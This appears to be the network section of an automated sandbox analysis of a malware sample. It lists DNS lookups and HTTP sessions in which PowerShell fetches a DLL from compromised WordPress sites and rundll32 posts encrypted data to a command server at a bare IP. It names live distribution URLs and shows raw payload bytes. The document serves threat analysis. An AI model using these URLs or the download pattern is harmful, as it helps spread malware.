                                            Jan 6, 2021 08:45:13.336997986 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.337002039 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.337021112 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.337038040 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.337044001 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.337084055 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.337424040 CET4916880192.168.2.22210.86.239.69
                                            Jan 6, 2021 08:45:13.602251053 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602288961 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602308989 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602325916 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602385998 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602412939 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602436066 CET8049168210.86.239.69192.168.2.22
                                            Jan 6, 2021 08:45:13.602557898 CET8049168210.86.239.69192.168.2.22

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 6, 2021 08:45:09.628824949 CET5219753192.168.2.228.8.8.8
                                            Jan 6, 2021 08:45:09.685398102 CET53521978.8.8.8192.168.2.22
                                            Jan 6, 2021 08:45:09.819693089 CET5309953192.168.2.228.8.8.8
                                            Jan 6, 2021 08:45:09.886931896 CET53530998.8.8.8192.168.2.22
                                            Jan 6, 2021 08:45:10.005924940 CET5283853192.168.2.228.8.8.8
                                            Jan 6, 2021 08:45:10.062089920 CET53528388.8.8.8192.168.2.22
                                            Jan 6, 2021 08:45:10.403311014 CET6120053192.168.2.228.8.8.8
                                            Jan 6, 2021 08:45:11.413362026 CET6120053192.168.2.228.8.8.8
                                            Jan 6, 2021 08:45:12.427134991 CET6120053192.168.2.228.8.8.8
                                            Jan 6, 2021 08:45:12.464422941 CET53612008.8.8.8192.168.2.22
                                            Jan 6, 2021 08:45:12.474410057 CET4954853192.168.2.228.8.8.8
                                            Jan 6, 2021 08:45:12.530816078 CET53495488.8.8.8192.168.2.22
                                            Jan 6, 2021 08:45:13.475646019 CET53612008.8.8.8192.168.2.22
                                            Jan 6, 2021 08:45:14.494803905 CET53612008.8.8.8192.168.2.22

                                            ICMP Packets

                                            TimestampSource IPDest IPChecksumCodeType
                                            Jan 6, 2021 08:45:13.475728035 CET192.168.2.228.8.8.8d00a(Port unreachable)Destination Unreachable
                                            Jan 6, 2021 08:45:14.495052099 CET192.168.2.228.8.8.8d00a(Port unreachable)Destination Unreachable

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Jan 6, 2021 08:45:09.628824949 CET192.168.2.228.8.8.80x51f2Standard query (0)wpsapk.comA (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:09.819693089 CET192.168.2.228.8.8.80x4aa4Standard query (0)sofsuite.comA (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:10.005924940 CET192.168.2.228.8.8.80x70c0Standard query (0)veterinariadrpopui.comA (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:10.403311014 CET192.168.2.228.8.8.80x3714Standard query (0)shop.elemenslide.comA (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:11.413362026 CET192.168.2.228.8.8.80x3714Standard query (0)shop.elemenslide.comA (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:12.427134991 CET192.168.2.228.8.8.80x3714Standard query (0)shop.elemenslide.comA (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:12.474410057 CET192.168.2.228.8.8.80xa6edStandard query (0)khanhhoahomnay.netA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Jan 6, 2021 08:45:09.685398102 CET8.8.8.8192.168.2.220x51f2No error (0)wpsapk.com104.18.61.59A (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:09.685398102 CET8.8.8.8192.168.2.220x51f2No error (0)wpsapk.com104.18.60.59A (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:09.685398102 CET8.8.8.8192.168.2.220x51f2No error (0)wpsapk.com172.67.141.14A (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:09.886931896 CET8.8.8.8192.168.2.220x4aa4No error (0)sofsuite.com104.27.145.251A (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:09.886931896 CET8.8.8.8192.168.2.220x4aa4No error (0)sofsuite.com172.67.158.72A (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:09.886931896 CET8.8.8.8192.168.2.220x4aa4No error (0)sofsuite.com104.27.144.251A (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:10.062089920 CET8.8.8.8192.168.2.220x70c0No error (0)veterinariadrpopui.com209.59.139.39A (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:12.464422941 CET8.8.8.8192.168.2.220x3714Server failure (2)shop.elemenslide.comnonenoneA (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:12.530816078 CET8.8.8.8192.168.2.220xa6edNo error (0)khanhhoahomnay.net210.86.239.69A (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:13.475646019 CET8.8.8.8192.168.2.220x3714Server failure (2)shop.elemenslide.comnonenoneA (IP address)IN (0x0001)
                                            Jan 6, 2021 08:45:14.494803905 CET8.8.8.8192.168.2.220x3714Server failure (2)shop.elemenslide.comnonenoneA (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • wpsapk.com
                                            • sofsuite.com
                                            • veterinariadrpopui.com
                                            • khanhhoahomnay.net
                                            • 5.2.136.90

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.2249165104.18.61.5980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 6, 2021 08:45:09.751085043 CET0OUTGET /wp-admin/v/ HTTP/1.1
                                            Host: wpsapk.com
                                            Connection: Keep-Alive
                                            Jan 6, 2021 08:45:09.806808949 CET1INHTTP/1.1 200 OK
                                            Date: Wed, 06 Jan 2021 07:45:09 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Set-Cookie: __cfduid=d221298cac29a42f50dcdd09dcc6b15471609919109; expires=Fri, 05-Feb-21 07:45:09 GMT; path=/; domain=.wpsapk.com; HttpOnly; SameSite=Lax
                                            X-Frame-Options: SAMEORIGIN
                                            cf-request-id: 077841329b0000c78df6240000000001
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=FLiijikAq1yY5im%2FIn1m0VtxDMUfFiQ8BMCPtMp3GNvn9ZyFRC%2FrDigSlLkdodQ20cvVRacEfupGVCZjEW0vg9MtdQR7Q1SBOfsp"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 60d3d16428b1c78d-AMS
                                            Data Raw: 31 30 64 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e
                                            Data Ascii: 10d4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,in


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.2249166104.27.145.25180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 6, 2021 08:45:09.938826084 CET6OUTGET /wp-includes/2jm3nIk/ HTTP/1.1
                                            Host: sofsuite.com
                                            Connection: Keep-Alive
                                            Jan 6, 2021 08:45:09.997203112 CET7INHTTP/1.1 200 OK
                                            Date: Wed, 06 Jan 2021 07:45:09 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Set-Cookie: __cfduid=d04c9b9fb7e02b7ebebe0ca82b9ae3faa1609919109; expires=Fri, 05-Feb-21 07:45:09 GMT; path=/; domain=.sofsuite.com; HttpOnly; SameSite=Lax
                                            X-Frame-Options: SAMEORIGIN
                                            cf-request-id: 07784133570000410ec883f000000001
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=k%2FHK4LVc0OWoEqoA6xqJR%2BidQk%2BEpiHeBJ5Uo%2FBOjXVc5C4OawfY9qh%2BKgwfdm80OopzZZ%2BzV4oWjY8BrJTNUmi76ipi8m7WWqLCMt4%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 60d3d1655bae410e-PRG
                                            Data Raw: 31 30 64 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68
                                            Data Ascii: 10dd<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.2249167209.59.139.3980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 6, 2021 08:45:10.223018885 CET12OUTGET /content/5f18Q/ HTTP/1.1
                                            Host: veterinariadrpopui.com
                                            Connection: Keep-Alive
                                            Jan 6, 2021 08:45:10.383809090 CET13INHTTP/1.1 500 Internal Server Error
                                            Date: Wed, 06 Jan 2021 07:45:10 GMT
                                            Server: Apache
                                            Content-Length: 7309
                                            Connection: close
                                            Content-Type: text/html
                                            Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 35 30 39 20 42 61 6e 64 77 69 64 74 68 20 4c 69 6d 69 74 20 45 78 63 65 65 64 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 6e 64 77 69 64 74 68 20 4c 69 6d 69 74 20 45 78 63 65 65 64 65 64 3c 2f 48 31 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>509 Bandwidth Limit Exceeded</TITLE></HEAD><BODY><H1>Bandwidth Limit Exceeded</H1>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            3192.168.2.2249168210.86.239.6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 6, 2021 08:45:12.797415972 CET21OUTGET /wordpress/CGMC/ HTTP/1.1
                                            Host: khanhhoahomnay.net
                                            Connection: Keep-Alive
                                            Jan 6, 2021 08:45:13.071660995 CET22INHTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Wed, 06 Jan 2021 07:45:13 GMT
                                            Content-Type: application/octet-stream
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Keep-Alive: timeout=60
                                            X-Powered-By: PHP/7.4.9
                                            Set-Cookie: 5ff56a8915748=1609919113; expires=Wed, 06-Jan-2021 07:46:13 GMT; Max-Age=60; path=/
                                            Cache-Control: no-cache, must-revalidate
                                            Pragma: no-cache
                                            Last-Modified: Wed, 06 Jan 2021 07:45:13 GMT
                                            Expires: Wed, 06 Jan 2021 07:45:13 GMT
                                            Content-Disposition: attachment; filename="rJGdausK.dll"
                                            Content-Transfer-Encoding: binary
                                            Data Raw: 31 64 64 37 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 16 3a bb d1 77 54 e8 d1 77 54 e8 d1 77 54 e8 15 b2 99 e8 dc 77 54 e8 15 b2 9a e8 8e 77 54 e8 15 b2 9b e8 f8 77 54 e8 2d 00 eb e8 d0 77 54 e8 2d 00 e8 e8 d3 77 54 e8 d1 77 55 e8 53 77 54 e8 2d 00 ed e8 c0 77 54 e8 f6 b1 9b e8 d5 77 54 e8 f6 b1 9e e8 d0 77 54 e8 f6 b1 9d e8 d0 77 54 e8 d1 77 c3 e8 d0 77 54 e8 f6 b1 98 e8 d0 77 54 e8 52 69 63 68 d1 77 54 e8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ff a1 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 be 00 00 00 4a 02 00 00 00 00 00 dc 45 00 00 00 10 00 00 00 d0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 03 00 00 04 00 00 00 00 00 00 02 00 00 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 19 01 00 cb 00 00 00 8c 0f 01 00 b4 00 00 00 00 50 01 00 20 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 03 00 a0 0c 00 00 10 d2 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 05 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 19 bd 00 00 00 10 00 00 00 be 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 4a 00 00 00 d0 00 00 00 4c 00 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2d 00 00 00 20 01 00 00 10 00 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 b2 01 00 00 50 01 00 00 b4 01 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 1a 00 00 00 10 03 00 00 1c 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Data Ascii: 1dd7MZ@!L!This program cannot be run in DOS mode.$:wTwTwTwTwTwT-wT-wTwUSwT-wTwTwTwTwwTwTRichwTPEL_!JE0P 8@.text `.rdataJL@@.data- @.rsrc P@@.relocH@B


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            4192.168.2.22491695.2.136.9080C:\Windows\SysWOW64\rundll32.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 6, 2021 08:45:31.116019964 CET221OUTPOST /6tycsc/ HTTP/1.1
                                            DNT: 0
                                            Referer: 5.2.136.90/6tycsc/
                                            Content-Type: multipart/form-data; boundary=----------OGLPvif2cE
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                            Host: 5.2.136.90
                                            Content-Length: 7412
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Jan 6, 2021 08:45:31.780097008 CET230INHTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Wed, 06 Jan 2021 07:45:32 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Vary: Accept-Encoding
                                            Data Raw: 61 35 34 0d 0a 7c d6 a8 f0 04 31 54 77 06 10 86 e0 e6 d2 54 af 79 da 34 36 cf d8 fa cb e9 89 cd 1a 22 2b fb d4 41 e9 5e dc 9d 15 ab 29 ce dd 43 a9 ae be 22 cc 93 4b 54 86 16 a5 9b df 45 0f 1a 84 24 d8 2e 49 fd 73 0d 21 c7 b2 b7 fc 54 d3 1a c3 1e e5 f7 5f 53 49 74 db 10 77 de b3 27 09 61 c3 c8 a6 8c 03 b4 27 52 24 81 cc 41 7f b5 d6 b0 5d 4a 16 a7 8b 07 e0 18 b2 60 5c 41 33 7e bf d0 03 87 dd 81 90 24 50 18 44 1d 82 d1 8f 88 c8 91 c9 7a 2b 84 b4 c3 57 a6 de 9d 86 92 81 9b be 08 5d 8f 17 5f ab 85 52 9f 01 d5 2f 13 19 3f 74 9d 2c 4b 51 78 ab fd 68 ad 85 65 3a 18 4d 14 b8 c2 e2 ce ce 78 f7 22 fe c0 d3 bc 0f ea b6 44 bb f9 86 7f 08 75 b6 d1 86 e0 6f 9e 5b 58 56 aa 59 6d 7c 78 66 b1 14 0d 89 a8 2e 2e c7 87 87 fb 65 8a 2e 3f a8 f7 68 a1 18 1f 23 4f 03 87 74 26 17 aa 7e 1a 88 2a a9 f0 01 f7 d8 be 69 0b 5e 8e 9a 99 3c 21 a2 72 96 b9 7f f3 50 aa a8 94 a0 0b 99 20 7c 4c 0d f2 fc a4 b9 0c d7 34 db db 4f a9 b9 fe ad 7d 20 86 86 47 77 e1 d2 19 a7 61 0e c6 0e 2f d2 f5 53 e9 08 62 51 b8 dc 5a 84 03 4f 10 d7 59 03 2e 3c e1 08 47 a9 f1 e4 4d 88 94 d4 e4 c5 fc 9d 1f a7 b3 b2 2e 1f 06 79 98 27 ef 34 f3 db ad 02 1c c8 8b 71 9d c3 f8 d7 31 1f 7f cb 86 df 93 09 e7 63 9c 5f b6 23 d3 f7 3a 2f 11 18 4d cc 